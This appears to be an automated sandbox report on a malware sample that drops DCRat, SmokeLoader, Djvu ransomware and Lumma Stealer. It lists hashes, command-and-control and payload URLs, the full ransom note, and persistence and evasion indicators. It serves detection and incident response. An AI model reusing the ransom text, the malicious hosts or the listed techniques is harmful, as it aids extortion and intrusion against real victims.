dcrat | 75aaf15409cca4ff0c2dd844f68e9ac05b8e47f5ce46a4c94f60f518e6ea53cf

Analysis

max time kernel
362s
max time network
1770s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
27-12-2023 06:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4363463463464363463463463.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

dcrat djvu lumma smokeloader lab backdoor bootkit discovery evasion infostealer persistence ransomware rat spyware stealer trojan upx

Malware Config

Extracted

Family

smokeloader

Botnet

lab

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Extracted

Family

djvu

http://zexeq.com/test1/get.php

Attributes

extension
.cdqw
offline_id
mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1
payload_url
http://brusuax.com/dl/build2.exe

http://zexeq.com/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-99MNqXMrdS Price of private key and decrypt software is $1999. Discount 50% available if you contact us first 72 hours, that's price for you is $999. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0840ASdw

rsa_pubkey.plain

Extracted

Family

lumma

http://soupinterestoe.fun/api

Signatures

DcRat 64 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

Processes:

4363463463464363463463463.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Software\Microsoft\SystemCertificates\My	4363463463464363463463463.exe
1508	schtasks.exe
1620	schtasks.exe
780	schtasks.exe
2264	schtasks.exe
968	schtasks.exe
2252	schtasks.exe
448	schtasks.exe
1716	schtasks.exe
632	schtasks.exe
576	schtasks.exe
2416	schtasks.exe
2512	schtasks.exe
3508	schtasks.exe
1988	schtasks.exe
2828	schtasks.exe
3044	schtasks.exe
1808	schtasks.exe
1748	schtasks.exe
2112	schtasks.exe
2884	schtasks.exe
1932	schtasks.exe
1660	schtasks.exe
1644	schtasks.exe
2492	schtasks.exe
952	schtasks.exe
1344	schtasks.exe
2296	schtasks.exe
632	schtasks.exe
1144	schtasks.exe
2564	schtasks.exe
2064	schtasks.exe
1036	schtasks.exe
2720	schtasks.exe
1460	schtasks.exe
2716	schtasks.exe
4952	schtasks.exe
3816	schtasks.exe
3196	schtasks.exe
2600	schtasks.exe
2840	schtasks.exe
1700	schtasks.exe
2948	schtasks.exe
1712	schtasks.exe
2036	schtasks.exe
1528	schtasks.exe
1804	schtasks.exe
1124	schtasks.exe
2072	schtasks.exe
2692	schtasks.exe
2408	schtasks.exe
3032	schtasks.exe
2552	schtasks.exe
2600	schtasks.exe
1608	schtasks.exe
3468	schtasks.exe
1764	schtasks.exe
2584	schtasks.exe
5116	schtasks.exe
588	schtasks.exe
2224	schtasks.exe
880	schtasks.exe
2872	schtasks.exe
1696	schtasks.exe

Detected Djvu ransomware 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1772-522-0x0000000002170000-0x000000000228B000-memory.dmp	family_djvu
behavioral1/memory/1824-524-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/1824-552-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/1512-563-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral1/memory/1512-614-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

DCRat payload 4 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\ARA.exe	dcrat
behavioral1/memory/1164-722-0x0000000000180000-0x0000000000310000-memory.dmp	dcrat
behavioral1/memory/2708-775-0x0000000001370000-0x0000000001500000-memory.dmp	dcrat
C:\Program Files (x86)\Internet Explorer\it-IT\conhost.exe	dcrat

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
2032	bcdedit.exe
3800	bcdedit.exe
4356	bcdedit.exe
2652	bcdedit.exe
1376	bcdedit.exe
5084	bcdedit.exe
2936	bcdedit.exe
3600	bcdedit.exe
3788	bcdedit.exe
4816	bcdedit.exe
1536	bcdedit.exe
1520	bcdedit.exe
3564	bcdedit.exe
3552	bcdedit.exe

Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Processes:

netsh.exe

pid process

3252 netsh.exe
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059

pid	process
3252	netsh.exe

Executes dropped EXE 16 IoCs

Processes:

easy.exetuc2.exetuc2.tmpqtlinkmaster.exeqtlinkmaster.exeiexplore.exeGo.exeGo.exeGo.exee756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exee756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exeiexplore.exe9741.exe

pid	process
2812	easy.exe
708	tuc2.exe
2220	tuc2.tmp
2780	qtlinkmaster.exe
2640	qtlinkmaster.exe
1508	iexplore.exe
2536	Go.exe
484
1380	Go.exe
2248	Go.exe
1216
1020	e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
2812	easy.exe
1072	e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
1772	iexplore.exe
1824	9741.exe

Loads dropped DLL 16 IoCs

Processes:

4363463463464363463463463.exetuc2.exetuc2.tmpe756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exeiexplore.exe

pid	process
2916	4363463463464363463463463.exe
2916	4363463463464363463463463.exe
708	tuc2.exe
2220	tuc2.tmp
2220	tuc2.tmp
2220	tuc2.tmp
2220	tuc2.tmp
2220	tuc2.tmp
2916	4363463463464363463463463.exe
2916	4363463463464363463463463.exe
2916	4363463463464363463463463.exe
2916	4363463463464363463463463.exe
2916	4363463463464363463463463.exe
2916	4363463463464363463463463.exe
1020	e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
1772	iexplore.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

2816 icacls.exe

pid	process
2816	icacls.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Files\lve.exe	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

Go.exe

description ioc process

File opened for modification \??\PhysicalDrive0 Go.exe

description	ioc	process
File opened for modification	\??\PhysicalDrive0	Go.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

easy.exee756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exeiexplore.exe

description	pid	process	target process
PID 2812 set thread context of 2952	2812	easy.exe	vbc.exe
PID 1020 set thread context of 1072	1020	e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe	e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
PID 1772 set thread context of 1824	1772	iexplore.exe	9741.exe

Drops file in Program Files directory 59 IoCs

Processes:

tuc2.tmp

description	ioc	process
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-TEKO6.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-GL9SR.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-6PEUT.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-1A3F3.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\lessmsi\is-BB3TD.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-AD22P.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-CKDFP.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-04LUB.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-S8IK7.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-UGSJR.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-RSAA4.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-RF75P.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-ID60Q.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-9Q9B7.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-IEN6H.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-P8984.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-2QL0R.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\is-N0H1U.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-9K8HJ.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-3I8AB.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-AAQV9.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\plugins\internal\is-HVK3P.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-Q2FV2.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\unins000.dat	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-BCOM6.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-UGNUL.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-KJ72P.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-I4FKC.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-2B93D.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-I1GC8.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-O0RUE.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-40CH1.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-SFHPR.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-KP65E.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\stuff\is-FEUB1.tmp	tuc2.tmp
File opened for modification	C:\Program Files (x86)\QtLinkMaster\unins000.dat	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-L0SF2.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-4JS2J.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-UQTGU.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\stuff\is-M4GAT.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\is-IR66D.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-FPAU4.tmp	tuc2.tmp
File opened for modification	C:\Program Files (x86)\QtLinkMaster\qtlinkmaster.exe	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-LL15G.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-OGG77.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-1BM36.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-NHA7F.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-6482I.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-FFU03.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-RDP46.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-IQHS1.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-0URR6.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-BSR9H.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\stuff\is-J79NH.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-0KVO9.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\stuff\is-4391E.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-15R43.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\is-UC5K5.tmp	tuc2.tmp
File created	C:\Program Files (x86)\QtLinkMaster\bin\x86\plugins\internal\is-HMBAV.tmp	tuc2.tmp

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

4416 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

4204 1096 WerFault.exe 4Yk875yz.exe
4332 1704 WerFault.exe build2.exe
1864 4528 WerFault.exe WatchDog.exe

pid	process
4416	sc.exe

pid	pid_target	process	target process
4204	1096	WerFault.exe	4Yk875yz.exe
4332	1704	WerFault.exe	build2.exe
1864	4528	WerFault.exe	WatchDog.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	e756885f12abdf5cc8450232691a4f55c1e524262825a4a00ced4f004a2c69c1.exe

Creates scheduled task(s) 1 TTPs 63 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2112	schtasks.exe
1700	schtasks.exe
2552	schtasks.exe
3196	schtasks.exe
632	schtasks.exe
588	schtasks.exe
2064	schtasks.exe
1712	schtasks.exe
2036	schtasks.exe
2948	schtasks.exe
1508	schtasks.exe
3044	schtasks.exe
2512	schtasks.exe
5116	schtasks.exe
2872	schtasks.exe
2584	schtasks.exe
2252	schtasks.exe
2884	schtasks.exe
2564	schtasks.exe
2600	schtasks.exe
448	schtasks.exe
1528	schtasks.exe
632	schtasks.exe
576	schtasks.exe
1932	schtasks.exe
3032	schtasks.exe
2224	schtasks.exe
952	schtasks.exe
2840	schtasks.exe
1660	schtasks.exe
968	schtasks.exe
2828	schtasks.exe
880	schtasks.exe
3508	schtasks.exe
1696	schtasks.exe
1716	schtasks.exe
1764	schtasks.exe
1460	schtasks.exe
2072	schtasks.exe
1344	schtasks.exe
1808	schtasks.exe
2296	schtasks.exe
3468	schtasks.exe
1748	schtasks.exe
2720	schtasks.exe
1608	schtasks.exe
1620	schtasks.exe
1124	schtasks.exe
2492	schtasks.exe
4952	schtasks.exe
2600	schtasks.exe
2408	schtasks.exe
780	schtasks.exe
2416	schtasks.exe
1988	schtasks.exe
1036	schtasks.exe
2716	schtasks.exe
2692	schtasks.exe
1644	schtasks.exe
2264	schtasks.exe
1144	schtasks.exe
1804	schtasks.exe
3816	schtasks.exe

Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

4248 timeout.exe
1676 timeout.exe
3976 timeout.exe
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4164 taskkill.exe
1996 taskkill.exe
1876 taskkill.exe
2780 taskkill.exe

pid	process
4248	timeout.exe
1676	timeout.exe
3976	timeout.exe

pid	process
4164	taskkill.exe
1996	taskkill.exe
1876	taskkill.exe
2780	taskkill.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

4363463463464363463463463.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54362000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd90b000000010000001200000044006900670069004300650072007400000014000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd155090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 1900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c543604000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	4363463463464363463463463.exe
